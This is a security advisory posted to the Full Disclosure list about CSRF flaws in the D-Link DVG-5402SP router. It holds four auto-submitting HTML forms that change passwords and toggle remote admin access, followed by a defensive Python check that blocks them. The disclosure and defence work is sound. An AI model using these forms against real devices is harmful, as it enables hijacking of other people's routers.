Full Disclosure mailing list archives
CSRF vulnerabilities in D-Link DVG-5402SP
From: "MustLive" <mustlive () websecurity com ua>
Date: Mon, 31 Jul 2017 23:55:20 +0300
Hello list!

There are multiple Cross-Site Request Forgery vulnerabilities in D-Link DVG-5402SP VoIP Router.

-------------------------
Affected products:
-------------------------

The following model is vulnerable: D-Link DVG-5402SP, Firmware RU_1.01. Other versions must also be vulnerable.

Since December 2014 the developers haven't answered me concerning vulnerabilities in DVG-5402SP and other D-Link devices, which I informed them about. Concerning these holes I informed them on 28.03.2016.
----------
Details:
----------

Cross-Site Request Forgery (WASC-09):

Change admin's password:

D-Link DVG-5402SP CSRF-1.html

<html>
<head><title>D-Link DVG-5402SP CSRF exploit (C) 2016 MustLive. http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/goform/AspPost" method="post">
<input type="hidden" name="K13" value="1">
<input type="hidden" name="ot_confirm_password_K13" value="1">
</form>
</body>
</html>

Change user's password:

D-Link DVG-5402SP CSRF-2.html

<html>
<head><title>D-Link DVG-5402SP CSRF exploit (C) 2016 MustLive. http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/goform/AspPost" method="post">
<input type="hidden" name="K374" value="1">
<input type="hidden" name="ot_confirm_password_K374" value="1">
</form>
</body>
</html>

Turn off remote access to web admin panel:

D-Link DVG-5402SP CSRF-3.html

<html>
<head><title>D-Link DVG-5402SP CSRF exploit (C) 2016 MustLive. http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/goform/AspPost" method="post">
<input type="hidden" name="K626" value="0">
</form>
</body>
</html>

Turn on remote access to web admin panel:

D-Link DVG-5402SP CSRF-4.html

<html>
<head><title>D-Link DVG-5402SP CSRF exploit (C) 2016 MustLive. http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/goform/AspPost" method="post">
<input type="hidden" name="K626" value="1">
</form>
</body>
</html>

Any settings in the admin panel can be changed similarly, such as turning off telnet access.

Cross-Site Request Forgery (WASC-09):

After the change, the password must be saved and the device restarted by a separate GET request:

http://site/ConfigBackupForm.asp

I mentioned these vulnerabilities on my site (http://websecurity.com.ua/7597/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
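
The forms in the message above succeed because the device accepts a state-changing request from any origin with no per-session token, and because the save/restart step is a plain GET. The Python below is an added example (not part of the original post and not D-Link's code) of the server-side checks that reject those requests; the `csrf_token` field name, the 192.0.2.1 and other-site.example hosts and the sample requests are assumptions constructed for the illustration.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Paths from the advisory; treating both as state-changing is this example's assumption.
STATE_CHANGING = {"/goform/AspPost", "/ConfigBackupForm.asp"}

def source_host(headers):
    """Host named by Origin, else Referer; None when neither is usable."""
    for name in ("Origin", "Referer"):
        value = headers.get(name)
        if value:
            return urlsplit(value).netloc.lower() or None
    return None

def check_request(method, path, headers, form, session_token):
    """Return (allowed, reason) for a request inside an authenticated session."""
    if path not in STATE_CHANGING:
        return True, "not state-changing"
    if method != "POST":
        return False, "state change requested with " + method
    src = source_host(headers)
    if src is None or src != headers.get("Host", "").lower():
        return False, "cross-site or missing Origin/Referer"
    sent = form.get("csrf_token", "")  # hypothetical hidden field name
    if not hmac.compare_digest(sent.encode(), session_token.encode()):
        return False, "missing or wrong CSRF token"
    return True, "ok"

# Constructed sample requests; the hosts and the token are made up for the example.
TOKEN = secrets.token_urlsafe(32)  # per-session secret the UI would embed in its forms
SAMPLES = {
    "forged password change": ("POST", "/goform/AspPost",
        {"Host": "192.0.2.1", "Origin": "http://other-site.example"},
        {"K13": "1", "ot_confirm_password_K13": "1"}),
    "forged save via GET": ("GET", "/ConfigBackupForm.asp",
        {"Host": "192.0.2.1", "Referer": "http://other-site.example/p.html"}, {}),
    "same-origin, no token": ("POST", "/goform/AspPost",
        {"Host": "192.0.2.1", "Origin": "http://192.0.2.1"}, {"K626": "0"}),
    "legitimate admin form": ("POST", "/goform/AspPost",
        {"Host": "192.0.2.1", "Origin": "http://192.0.2.1"},
        {"K626": "0", "csrf_token": TOKEN}),
}
def run_samples():
    return {name: check_request(*req, TOKEN) for name, req in SAMPLES.items()}

if __name__ == "__main__":
    for name, (ok, why) in run_samples().items():
        print(f"{'ALLOW' if ok else 'DENY '}  {name}: {why}")
```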